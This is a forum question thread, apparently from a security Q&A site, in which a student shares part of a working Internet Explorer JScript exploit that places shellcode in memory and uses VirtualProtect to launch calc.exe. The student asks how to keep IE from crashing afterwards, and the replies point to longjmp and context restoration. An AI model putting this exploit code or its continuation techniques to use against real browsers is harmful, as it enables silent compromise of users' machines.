2

I am a student studying information security. Recently I read this article link and made full exploit code. calc.exe is executed as expected. But after running shellcode, IE just crashed. (because no more code provided after shellcode...). I tried to avoid crash but could not find proper solution. What I tried is as follows.

            ... var jscriptPointer = readDWORD(fakeRegExpAddr);
                var jscriptBase = resolveModuleBase(jscriptPointer);
                var kernel32Pointer = resolveModuleByIAT(jscriptBase, "KERNEL32.dll");
                var kernel32Base = resolveModuleBase(kernel32Pointer);
                var VirtualProtect = resolveKernel32Function(kernel32Base, "VirtualProtect");
                var GetModuleHandleA = resolveKernel32Function(kernel32Base, "GetModuleHandleA");
                var GetProcAddress = resolveKernel32Function(kernel32Base, "GetProcAddress");
                var stack = a(fakeRegExpAddr, readDWORD(fakeRegExpAddr));
                var regExpExecAddress = ((stack.charCodeAt(4)<<16)|stack.charCodeAt(3)) - 0x44;
                var oldEbp = ((stack.charCodeAt(7)&0xFF)<<24) | (stack.charCodeAt(6)<<8) | ((stack.charCodeAt(5)>>8)&0xFF);
                var newEbp = regExpExecAddress - 0x2000;
                var pLongjmpTarget = regExpExecAddress;
                var sc = fakeRegExpAddr + sizeof_RegExpObj;
                for(var f=0; f<shellcode.length; f++){
                    a(sc + (f * sizeof_WORD), shellcode.charCodeAt(f));
                }
                    var ctx = sc + 5;
                    a(ctx + (2 * e), oldEbp);         // these two lines are for passing data
                    a(ctx + (3 * e), pLongjmpTarget); // to shellcode.
                
                for(var f=newEbp-0x20; f<newEbp+0x40; f+=U)
                {
                    a(f,0x7FFE0000);
                }
                
                a(newEbp + 4, VirtualProtect);
                a(newEbp + 4 + 4 + 0x18, sc);
                a(newEbp + 4 + 4 + 4 + 0x18, sc);
                a(newEbp + 4 + 4 + 4 + 4 + 0x18, (shellcode.length * sizeof_WCHAR));
                a(newEbp + 4 + 4 + 4 + 4 + 4 + 0x18, 0x40);
                a(newEbp + 4 + 4 + 4 + 4 + 4 + 4 + 0x18, newEbp);
                a(regExpExecAddress, newEbp);
            }

This code is referenced from this link. Then I don't know what to do in shellcode. how can I handle this problem? Any suggestions are welcomed. Thanks in advance.

ruslan
  • 21
  • 4
  • It's not really a problem. You did your thing and executed your code. Even in a real-world scenario, who is surprized at IE crashing? –  Nov 11 '20 at 16:42
  • As I have mentioned, I am a student and I want to learn something. So could you provide some methods to avoid crash? – ruslan Nov 11 '20 at 16:45
  • Depending on the explout, it may be unavoidable. –  Nov 11 '20 at 16:50
  • 1
    I first get context of ie process using rtlcapturecontext windows api, then after running calc.exe, I just restored context using ntcontinue function. Eip moved as expected. But after running a few instructions, just crashed agian. what else can i do? – ruslan Nov 11 '20 at 16:54
  • after running shellcode, no more javascript code needs to be executed. So I want to exit javascript code. Is it possible? – ruslan Nov 12 '20 at 01:04
  • 1
    Just give it time, binary exploitation isn't the most popular topic here. If you haven't gotten an answer by tomorrow, I'll add a bounty –  Nov 12 '20 at 10:10
  • @MechMK: Thank you. I am waiting for your answer. Any suggestions are welcomed. – ruslan Nov 12 '20 at 15:56
  • Unfortunately, I don't have one. I'm not an expert in binary exploitation, but after I think 48 hours passed, I'll add a bounty, which encourages others to answer. –  Nov 12 '20 at 16:02
  • Thank you for your attention – ruslan Nov 12 '20 at 16:06
  • Here is your bounty. Hope you get a nice answer now –  Nov 14 '20 at 14:17
  • Thank you so much. – ruslan Nov 14 '20 at 14:19
  • 2
    See longjmp usage here: https://stackoverflow.com/questions/14685406/practical-usage-of-setjmp-and-longjmp-in-c – Overmind Nov 16 '20 at 13:40
  • Chances are you are not correctly restoring the execution of the program to the expected execution. Process continuation itself is an art in exploitation. – J-- Jun 06 '22 at 10:59

1 Answers1

-1

This can be solved by longjmp. longjmp is similar to goto, so this can rollback to original state of your code.

bypasser
  • 7
  • 2
  • 4
    thank you for your reply. But could you specify more details? – ruslan Nov 14 '20 at 09:33
  • This doesn't really answer the question at all. Could you perhaps give a clearer explanation or add some code? –  Nov 14 '20 at 14:18